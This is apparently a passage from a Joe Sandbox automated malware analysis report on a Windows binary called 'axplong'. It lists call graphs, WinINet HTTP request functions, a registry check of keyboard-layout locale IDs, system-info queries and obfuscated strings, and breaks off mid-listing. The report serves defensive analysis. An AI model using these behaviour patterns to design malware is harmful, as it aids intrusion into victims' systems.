92683a __cftof 5 API calls 14654->14655 14656 9268cf 14655->14656 14656->14648 14669 92676b 14657->14669 14659 926835 14659->14653 14660 926c99 14659->14660 14661 926cc4 __cftof 14660->14661 14667 926ca7 __cftof __dosmaperr 14660->14667 14662 926d06 CreateFileW 14661->14662 14668 926cea __cftof __dosmaperr 14661->14668 14663 926d2a 14662->14663 14664 926d38 14662->14664 14683 926e01 GetFileType 14663->14683 14697 926d77 14664->14697 14667->14653 14668->14653 14670 926793 14669->14670 14672 926779 __dosmaperr __fassign 14669->14672 14671 92679a 14670->14671 14674 9267b9 __fassign 14670->14674 14671->14672 14676 926916 14671->14676 14672->14659 14674->14672 14675 926916 RtlAllocateHeap 14674->14675 14675->14672 14677 926924 14676->14677 14680 926955 14677->14680 14681 92af0b __cftof RtlAllocateHeap 14680->14681 14682 926935 14681->14682 14682->14672 14684 926e3c 14683->14684 14689 926ed2 __dosmaperr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14683->14689 14685 926e56 __cftof 14684->14685 14719 927177 14684->14719 14687 926e75 GetFileInformationByHandle 14685->14687 14685->14689 14688 926e8b 14687->14688 14687->14689 14705 9270c9 14688->14705 14689->14668 14693 926ea8 14694 926f71 SystemTimeToTzSpecificLocalTime 14693->14694 14695 926ebb 14694->14695 14696 926f71 SystemTimeToTzSpecificLocalTime 14695->14696 14696->14689 14738 927314 14697->14738 14699 926d85 14700 926d8a __dosmaperr 14699->14700 14701 9270c9 5 API calls 14699->14701 14700->14668 14702 926da3 14701->14702 14703 927177 RtlAllocateHeap 14702->14703 14704 926dc2 14703->14704 14704->14668 14707 9270df _wcsrchr 14705->14707 14706 926e97 14715 926f71 14706->14715 14707->14706 14723 92b9e4 14707->14723 14709 927123 14709->14706 14710 92b9e4 5 API calls 14709->14710 14711 927134 14710->14711 14711->14706 14712 92b9e4 5 API calls 14711->14712 14713 927145 14712->14713 14713->14706 14714 92b9e4 5 API calls 14713->14714 14714->14706 14716 926f89 14715->14716 14717 926fa9 SystemTimeToTzSpecificLocalTime 14716->14717 14718 926f8f __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14716->14718 14717->14718 14718->14693 14720 927190 14719->14720 14722 9271a4 __dosmaperr 14720->14722 14734 92b568 14720->14734 14722->14685 14725 92b9f2 14723->14725 14727 92b9f8 __cftof __dosmaperr 14725->14727 14728 92ba2d 14725->14728 14726 92ba28 14726->14709 14727->14709 14729 92ba57 14728->14729 14731 92ba3d __cftof __dosmaperr 14728->14731 14730 92683a __cftof 5 API calls 14729->14730 14729->14731 14733 92ba81 14730->14733 14731->14726 14732 92b9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14732->14733 14733->14731 14733->14732 14735 92b592 __cftof 14734->14735 14736 92d6ef RtlAllocateHeap 14735->14736 14737 92b5ae __dosmaperr __freea __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14735->14737 14736->14737 14737->14722 14739 927338 14738->14739 14741 92733e ___std_exception_destroy __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14739->14741 14742 927036 14739->14742 14741->14699 14743 927042 __dosmaperr 14742->14743 14748 92b87b 14743->14748 14745 927068 14745->14741 14746 92705a __dosmaperr 14746->14745 14747 92b87b 2 API calls 14746->14747 14747->14745 14751 92b6de 14748->14751 14750 92b894 14750->14746 14752 92b75a 14751->14752 14753 92b6ee 14751->14753 14768 931ef8 14752->14768 14753->14752 14754 92b6f5 14753->14754 14756 92b702 ___std_exception_destroy 14754->14756 14760 92b675 14754->14760 14756->14750 14758 92b73b 14764 92b815 14758->14764 14761 92b690 14760->14761 14763 92b695 __dosmaperr 14761->14763 14771 92b7b7 14761->14771 14763->14758 14765 92b83b __cftof 14764->14765 14766 92b822 14764->14766 14765->14756 14766->14765 14767 928aa4 ___std_exception_copy RtlAllocateHeap 14766->14767 14767->14765 14778 931d22 14768->14778 14770 931f0f 14770->14756 14772 92b7c5 14771->14772 14775 92b7f6 14772->14775 14776 928aa4 ___std_exception_copy RtlAllocateHeap 14775->14776 14777 92b7d6 14776->14777 14777->14763 14779 931d54 14778->14779 14787 931d40 __cftof __dosmaperr ___std_exception_destroy __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14778->14787 14780 92b568 RtlAllocateHeap 14779->14780 14781 931d5c 14779->14781 14780->14781 14782 92b7b7 RtlAllocateHeap 14781->14782 14781->14787 14783 931de9 14782->14783 14784 92b675 RtlAllocateHeap 14783->14784 14785 931df6 14784->14785 14786 92b815 RtlAllocateHeap 14785->14786 14785->14787 14786->14787 14787->14770 14788 92d6ef 14789 92d6fc __cftof 14788->14789 14790 92d727 RtlAllocateHeap 14789->14790 14791 92d73a __dosmaperr 14789->14791 14790->14789 14790->14791

                                                                    Executed Functions

                                                                    Function 008FBD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310networkfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 760 8fbd60-8fbdac 761 8fbdb2-8fbdb6 760->761 762 8fc1a1-8fc1c6 call 907f30 760->762 761->762 763 8fbdbc-8fbdc0 761->763 767 8fc1c8-8fc1d4 762->767 768 8fc1f4-8fc20c 762->768 763->762 765 8fbdc6-8fbe4f InternetOpenW InternetConnectA call 907870 call 8f5b20 763->765 794 8fbe53-8fbe6f HttpOpenRequestA 765->794 795 8fbe51 765->795 770 8fc1ea-8fc1f1 call 90d593 767->770 771 8fc1d6-8fc1e4 767->771 772 8fc158-8fc170 768->772 773 8fc212-8fc21e 768->773 770->768 771->770 775 8fc26f-8fc274 call 926b9a 771->775 779 8fc176-8fc182 772->779 780 8fc243-8fc25f call 90cf21 772->780 777 8fc14e-8fc155 call 90d593 773->777 778 8fc224-8fc232 773->778 777->772 778->775 785 8fc234 778->785 786 8fc239-8fc240 call 90d593 779->786 787 8fc188-8fc196 779->787 785->777 786->780 787->775 793 8fc19c 787->793 793->786 798 8fbe71-8fbe80 794->798 799 8fbea0-8fbf0f call 907870 call 8f5b20 call 907870 call 8f5b20 794->799 795->794 800 8fbe96-8fbe9d call 90d593 798->800 801 8fbe82-8fbe90 798->801 812 8fbf13-8fbf29 HttpSendRequestA 799->812 813 8fbf11 799->813 800->799 801->800 814 8fbf2b-8fbf3a 812->814 815 8fbf5a-8fbf82 812->815 813->812 816 8fbf3c-8fbf4a 814->816 817 8fbf50-8fbf57 call 90d593 814->817 818 8fbf84-8fbf93 815->818 819 8fbfb3-8fbfd4 InternetReadFile 815->819 816->817 817->815 821 8fbfa9-8fbfb0 call 90d593 818->821 822 8fbf95-8fbfa3 818->822 823 8fbfda 819->823 821->819 822->821 826 8fbfe0-8fc090 call 924180 823->826
                                                                    APIs
                                                                    • InternetOpenW.WININET(00948D70,00000000,00000000,00000000,00000000), ref: 008FBDED
                                                                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 008FBE11
                                                                    • HttpOpenRequestA.WININET(?,00000000), ref: 008FBE5B
                                                                    • HttpSendRequestA.WININET(?,00000000), ref: 008FBF1B
                                                                    • InternetReadFile.WININET(?,?,000003FF,?), ref: 008FBFCC
                                                                    • InternetCloseHandle.WININET(?), ref: 008FC0A7
                                                                    • InternetCloseHandle.WININET(?), ref: 008FC0AF
                                                                    • InternetCloseHandle.WININET(?), ref: 008FC0B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                                                                    • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
                                                                    • API String ID: 688256393-332458646
                                                                    • Opcode ID: e6437b3bd137ca55cac62e41ba2224bffca0ed37642df3c99848774588491079
                                                                    • Instruction ID: 65b0796e36b534a9da899ad8f7405e65e070bd8d720d36bd93324a2071be088c
                                                                    • Opcode Fuzzy Hash: e6437b3bd137ca55cac62e41ba2224bffca0ed37642df3c99848774588491079
                                                                    • Instruction Fuzzy Hash: BEB1C5B1A1011C9BEB24CF28CD85BAEBB65FF85314F5041A9F609D72C2DB709AC4CB95
                                                                    Function 0090D312 Relevance: .2, Instructions: 172COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 008F247E
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ___std_exception_copy
                                                                    • String ID:
                                                                    • API String ID: 2659868963-0
                                                                    • Opcode ID: d68ccd1783c33a997030b34c20ef025d0d789b842e3173905b9b771a318b3c7e
                                                                    • Instruction ID: 6b0cf0d843a03c3e8a9051ad0e613a714710099721a155eca6d026a0c82aba46
                                                                    • Opcode Fuzzy Hash: d68ccd1783c33a997030b34c20ef025d0d789b842e3173905b9b771a318b3c7e
                                                                    • Instruction Fuzzy Hash: 0551DFB2A167058FDB15CFA9E8917AEB7F8FB48310F24852AD805EB6D1D3349940CF50
                                                                    Function 009046C0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00907870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0090795C
                                                                      • Part of subcall function 00907870: __Cnd_destroy_in_situ.LIBCPMT ref: 00907968
                                                                      • Part of subcall function 00907870: __Mtx_destroy_in_situ.LIBCPMT ref: 00907971
                                                                      • Part of subcall function 008FBD60: InternetOpenW.WININET(00948D70,00000000,00000000,00000000,00000000), ref: 008FBDED
                                                                      • Part of subcall function 008FBD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 008FBE11
                                                                      • Part of subcall function 008FBD60: HttpOpenRequestA.WININET(?,00000000), ref: 008FBE5B
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00904EA2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                                                                    • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
                                                                    • API String ID: 2414744145-1662704651
                                                                    • Opcode ID: 87d6dc3d8a4164fb04200d3b1f9da87153f9ac900ba61891e389268850b4d56a
                                                                    • Instruction ID: 0e67672c97733a34d992da8a780ee709b0ad92fc6315c422c7b8b6a411af3360
                                                                    • Opcode Fuzzy Hash: 87d6dc3d8a4164fb04200d3b1f9da87153f9ac900ba61891e389268850b4d56a
                                                                    • Instruction Fuzzy Hash: F6231371E002589FEB19DB28CD8979DBB76AB81304F5081D8E448AB2D6EB359FC4CF51
                                                                    Function 008F5DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 915 8f5df0-8f5eee 921 8f5f18-8f5f25 call 90cf21 915->921 922 8f5ef0-8f5efc 915->922 924 8f5f0e-8f5f15 call 90d593 922->924 925 8f5efe-8f5f0c 922->925 924->921 925->924 927 8f5f26-8f60ad call 926b9a call 90e080 call 907f30 * 5 RegOpenKeyExA 925->927 944 8f6478-8f6481 927->944 945 8f60b3-8f6143 call 924020 927->945 947 8f64ae-8f64b7 944->947 948 8f6483-8f648e 944->948 971 8f6149-8f614d 945->971 972 8f6466-8f6472 945->972 949 8f64b9-8f64c4 947->949 950 8f64e4-8f64ed 947->950 952 8f64a4-8f64ab call 90d593 948->952 953 8f6490-8f649e 948->953 954 8f64da-8f64e1 call 90d593 949->954 955 8f64c6-8f64d4 949->955 956 8f64ef-8f64fa 950->956 957 8f651a-8f6523 950->957 952->947 953->952 958 8f659e-8f65a3 call 926b9a 953->958 954->950 955->954 955->958 962 8f64fc-8f650a 956->962 963 8f6510-8f6517 call 90d593 956->963 965 8f654c-8f6555 957->965 966 8f6525-8f6530 957->966 962->958 962->963 963->957 968 8f6557-8f6566 965->968 969 8f6582-8f659d call 90cf21 965->969 975 8f6542-8f6549 call 90d593 966->975 976 8f6532-8f6540 966->976 978 8f6578-8f657f call 90d593 968->978 979 8f6568-8f6576 968->979 980 8f6153-8f6187 RegEnumValueW 971->980 981 8f6460 971->981 972->944 975->965 976->958 976->975 978->969 979->958 979->978 986 8f644d-8f6454 980->986 987 8f618d-8f61ad 980->987 981->972 986->980 990 8f645a 986->990 992 8f61b0-8f61b9 987->992 990->981 992->992 993 8f61bb-8f624d call 907c50 call 908090 call 907870 * 2 call 8f5c60 992->993 993->986
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                    • API String ID: 0-3963862150
                                                                    • Opcode ID: efc5b3c09422a19f8c4302db2dfecda581c67d2a26719ef1b0813b84c32626a6
                                                                    • Instruction ID: 2b3782021958499aa041d3f4ba10bf87303f8a52dfc62c447ee531162c7c8f21
                                                                    • Opcode Fuzzy Hash: efc5b3c09422a19f8c4302db2dfecda581c67d2a26719ef1b0813b84c32626a6
                                                                    • Instruction Fuzzy Hash: 8EE17D7190121CAFEB24DFA4CC89BEEB779EB44304F5042D9E509A7291EB74ABC48F51
                                                                    Function 008F7D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1003 8f7d00-8f7d82 call 924020 1007 8f827e-8f829b call 90cf21 1003->1007 1008 8f7d88-8f7db0 call 907870 call 8f5b20 1003->1008 1015 8f7db4-8f7dd6 call 907870 call 8f5b20 1008->1015 1016 8f7db2 1008->1016 1021 8f7dda-8f7df3 1015->1021 1022 8f7dd8 1015->1022 1016->1015 1025 8f7df5-8f7e04 1021->1025 1026 8f7e24-8f7e4f 1021->1026 1022->1021 1027 8f7e1a-8f7e21 call 90d593 1025->1027 1028 8f7e06-8f7e14 1025->1028 1029 8f7e51-8f7e60 1026->1029 1030 8f7e80-8f7ea1 1026->1030 1027->1026 1028->1027 1031 8f829c call 926b9a 1028->1031 1033 8f7e76-8f7e7d call 90d593 1029->1033 1034 8f7e62-8f7e70 1029->1034 1035 8f7ea7-8f7eac 1030->1035 1036 8f7ea3-8f7ea5 GetNativeSystemInfo 1030->1036 1044 8f82a1-8f82a6 call 926b9a 1031->1044 1033->1030 1034->1031 1034->1033 1037 8f7ead-8f7eb6 1035->1037 1036->1037 1042 8f7eb8-8f7ebf 1037->1042 1043 8f7ed4-8f7ed7 1037->1043 1046 8f8279 1042->1046 1047 8f7ec5-8f7ecf 1042->1047 1048 8f821f-8f8222 1043->1048 1049 8f7edd-8f7ee6 1043->1049 1046->1007 1051 8f8274 1047->1051 1048->1046 1054 8f8224-8f822d 1048->1054 1052 8f7ef9-8f7efc 1049->1052 1053 8f7ee8-8f7ef4 1049->1053 1051->1046 1056 8f81fc-8f81fe 1052->1056 1057 8f7f02-8f7f09 1052->1057 1053->1051 1058 8f822f-8f8233 1054->1058 1059 8f8254-8f8257 1054->1059 1060 8f820c-8f820f 1056->1060 1061 8f8200-8f820a 1056->1061 1062 8f7f0f-8f7f6b call 907870 call 8f5b20 call 907870 call 8f5b20 call 8f5c60 1057->1062 1063 8f7fe9-8f81e5 call 907870 call 8f5b20 call 907870 call 8f5b20 call 8f5c60 call 907870 call 8f5b20 call 8f5640 call 907870 call 8f5b20 call 907870 call 8f5b20 call 8f5c60 call 907870 call 8f5b20 call 8f5640 call 907870 call 8f5b20 call 907870 call 8f5b20 call 8f5c60 call 907870 call 8f5b20 call 8f5640 1057->1063 1064 8f8248-8f8252 1058->1064 1065 8f8235-8f823a 1058->1065 1066 8f8259-8f8263 1059->1066 1067 8f8265-8f8271 1059->1067 1060->1046 1069 8f8211-8f821d 1060->1069 1061->1051 1088 8f7f70-8f7f77 1062->1088 1100 8f81eb-8f81f4 1063->1100 1064->1046 1065->1064 1071 8f823c-8f8246 1065->1071 1066->1046 1067->1051 1069->1051 1071->1046 1090 8f7f7b-8f7f9b call 928a81 1088->1090 1091 8f7f79 1088->1091 1097 8f7f9d-8f7fac 1090->1097 1098 8f7fd2-8f7fd4 1090->1098 1091->1090 1103 8f7fae-8f7fbc 1097->1103 1104 8f7fc2-8f7fcf call 90d593 1097->1104 1098->1100 1101 8f7fda-8f7fe4 1098->1101 1100->1048 1106 8f81f6 1100->1106 1101->1100 1103->1044 1103->1104 1104->1098 1106->1056
                                                                    APIs
                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008F7EA3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoNativeSystem
                                                                    • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                                                                    • API String ID: 1721193555-2057465332
                                                                    • Opcode ID: f6aa4d16a8ab37db4555c762e975c8aabb82854bb058c59c9dc2aa8ec0e2c9db
                                                                    • Instruction ID: cb29cb8010b683c0e446d5955bc010aa9175004a5d865a6d45a53ee4b21f6e34
                                                                    • Opcode Fuzzy Hash: f6aa4d16a8ab37db4555c762e975c8aabb82854bb058c59c9dc2aa8ec0e2c9db
                                                                    • Instruction Fuzzy Hash: 97D1E870E0460C9BDB14EB78CD5A3AD7B61FB82324F904298E915A73C2DB359E8487D2
                                                                    Function 00926E01 Relevance: 4.6, APIs: 3, Instructions: 145COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1141 926e01-926e36 GetFileType 1142 926eee-926ef1 1141->1142 1143 926e3c-926e47 1141->1143 1146 926ef3-926ef6 1142->1146 1147 926f1a-926f42 1142->1147 1144 926e69-926e85 call 924020 GetFileInformationByHandle 1143->1144 1145 926e49-926e5a call 927177 1143->1145 1156 926f0b-926f18 call 92740d 1144->1156 1162 926e8b-926ecd call 9270c9 call 926f71 * 3 1144->1162 1159 926e60-926e67 1145->1159 1160 926f07-926f09 1145->1160 1146->1147 1152 926ef8-926efa 1146->1152 1148 926f44-926f57 1147->1148 1149 926f5f-926f61 1147->1149 1148->1149 1165 926f59-926f5c 1148->1165 1154 926f62-926f70 call 90cf21 1149->1154 1152->1156 1157 926efc-926f01 call 927443 1152->1157 1156->1160 1157->1160 1159->1144 1160->1154 1177 926ed2-926eea call 927096 1162->1177 1165->1149 1177->1149 1180 926eec 1177->1180 1180->1160
                                                                    APIs
                                                                    • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00926E23
                                                                    • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00926E7D
                                                                    • __dosmaperr.LIBCMT ref: 00926F12
                                                                      • Part of subcall function 00927177: __dosmaperr.LIBCMT ref: 009271AC
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File__dosmaperr$HandleInformationType
                                                                    • String ID:
                                                                    • API String ID: 2531987475-0
                                                                    • Opcode ID: 15eb1d6a9494168f744c2645cc12916a3a95f9dcd578f60c4069e7f0bbd100b6
                                                                    • Instruction ID: 633fc8fe20fb7f6f930cc5dd9b83fb3cabfb98aa82f401d21f5913c4049cdbf1
                                                                    • Opcode Fuzzy Hash: 15eb1d6a9494168f744c2645cc12916a3a95f9dcd578f60c4069e7f0bbd100b6
                                                                    • Instruction Fuzzy Hash: 53414C75901214ABDF24EFB5E945AEFBBF9EF89300B10442DF856E3614EB319904CB61
                                                                    Function 00907870 Relevance: 4.6, APIs: 3, Instructions: 123COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
